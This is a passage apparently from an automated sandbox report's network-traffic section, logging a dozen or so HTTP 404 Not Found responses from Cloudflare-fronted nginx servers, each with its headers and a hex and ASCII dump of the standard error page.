3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJ%2FCVGNmpoaoaxr0pQC0jxHidgbekhRyFoCWL91PWn4kO3CPjoYzbM%2FU2EBJth9ATjFJM6JbJ05pj%2F7iNnMhgyPkugBRm2JpMAEql53nXwHdbd9Kzm3GzFHTteWeIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015707a89bdc358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2913&min_rtt=1681&rtt_var=3095&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=126505&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxtWvZsvycmc%2F0rFVkRccosdL16ecCqJM1CuIaYf%2BrVMocYf20cD%2F%2BYAY07iD3srtOIhagZ0AArjBssIbWgHZl6OiJhrkDSAx7AsDABSsssVB1b804E%2FN3M1%2F%2Fmqqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901570aa2db98ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3614&min_rtt=2363&rtt_var=3388&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=118008&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:38:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVmKRnzS2Ne105hqKBpaMTQtf3IBZibIRToJPtDT0Xl%2BA89RNCPSY33KLVLMpup%2FfE%2BuNylKcbH8%2BQ0Ikk0ET%2Bp%2BPCqbHqlFQFF4fiZWmuJo4jU6SOgOPetcrClU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901570fa39b07c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3944&min_rtt=2004&rtt_var=4632&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=83290&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:38:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoQCe17d%2FgQqHI26kTCODwJNWZyFRDNoz7te71K4odsXpHYZHXLvfgTZze7YOV3r4fL%2FEdjr4f9aAYc3fHbQA8p6p76sNzg31LfxQgRKsum9%2F9Po6MeizqCdxQdfVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015712cdcb2de95-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1744&rtt_var=874&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=556190&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:38:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JulNbpO6M6cr2LMAd6WS5v%2BIqLg5U2YBcswd0H9dnuOUPPXkgsUQ0tctPoftPrFVJ5886s%2BR4XQ%2BptM%2BsA%2BwVEwAldu0R4lJzLdEptCPgfgtrWPpIPnwwlZuJwU%2BhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015715ee94ade95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3520&min_rtt=1628&rtt_var=4394&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=87091&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:38:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKUYprkkH61xJDUpPBBF6Yqc671ldjVkPYWjS1HbiEVZ3WAJUJhdAkN6Q%2FK3KEYZWM6GJVbEwFCckIjN%2BTtzTnwYaxxTSA9urX2Od30xdkWEbdY3Q%2FsK2dzzzcWxhQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901571ac0f27de95-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3884&min_rtt=1573&rtt_var=5212&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=72770&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:38:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4S762jdOnFtxG70urj1FVwLeee6ySKQ6f6m8YZ4SefX%2BTgtdm78g8bAokfY7l5wDj0vu69b4q2plVfsBXV70vm1bcdn6hxlz1icpF32%2F%2FlcKT%2FXXTbI8Ab4G9DyIA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901571d99d427c6a-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=5001&min_rtt=1955&rtt_var=6825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=55462&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:38:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Llc2qZbjFiVUanQLRGl8Se%2BsicWC%2FF%2FIwN32rA%2BYoF1NohCdAHVGUJrYypBacgeRPLmXfOGnzknHe3QnsHOjq5fSxdZYfHV%2FX5Wd%2FGayNj3LelB%2FzaVyUAJ4HKaH%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015721fae494414-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3979&min_rtt=1715&rtt_var=5171&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=73629&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:39:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0KkWIaKNGgig5Wjcbg1Kk%2BNj%2BiRSeqQhzumS6Tc6LCwq%2BS6%2Bp4SRkQbK%2Bgm5YLrg87jgxPvU6egWH2S5duCFIk1dC69hzT9ckXDsQ3pMnex0gnBubLHI9rYvjV2Wg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90157263b8eede95-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3657&min_rtt=1750&rtt_var=4470&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=85841&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:39:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8w2RbbRnkDk0NXQqvdq85upWQ2D3wA69CfGbiTJaBUOiemx9c1PbjQ7iEbQpfZKi5AhzJQ30Qaa3T%2BLYYe54NYP1cOwAU3ZlWRdUHecWZYGTISZ1DkSaS1Jew5pYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015728e3944de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4126&min_rtt=1626&rtt_var=5611&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=683&delivery_rate=67492&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:39:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2UikfKH73w4wsury6Wo2Pn5VM8G6KS9GfnQEJcsPVjkeyx91ReB5i4tiCE6QVO6YeQ9pN7mAitaK2nrvIFA9vXoeUvHLyMNpmlwr%2BZoyehEjxI0kLUE6cMdZB5QJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901572d4192dc358-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1547&rtt_var=661&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=780748&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:39:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2%2F%2By1X8Ky15NfN%2B4w3agwdSGhC%2BZsJtHKUUlCR0JKGfnG9qDoe4A1bRXz69HouDla70EgjHjctqQE2ENho0I2zlbu4cCbB21xLeRwqFUsklO1Q0WTF9z7zKBE%2Bc8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90157318493c8ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3889&min_rtt=1965&rtt_var=4586&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=84082&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:39:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P46V3VI57W%2Bu5JlrrGPJA9F4bpK38D01x1sJyT90iJPlfkDYXE2PuMsGdxSg6gjhbiJxKWHL6cJAD1h%2FmlWtkTzLUuKVXs%2FEEHXuGvnDh4%2F0ZXBNVKUDlTxF5S3l5w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015735c8819de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7927&min_rtt=1662&rtt_var=13155&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=683&delivery_rate=28191&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 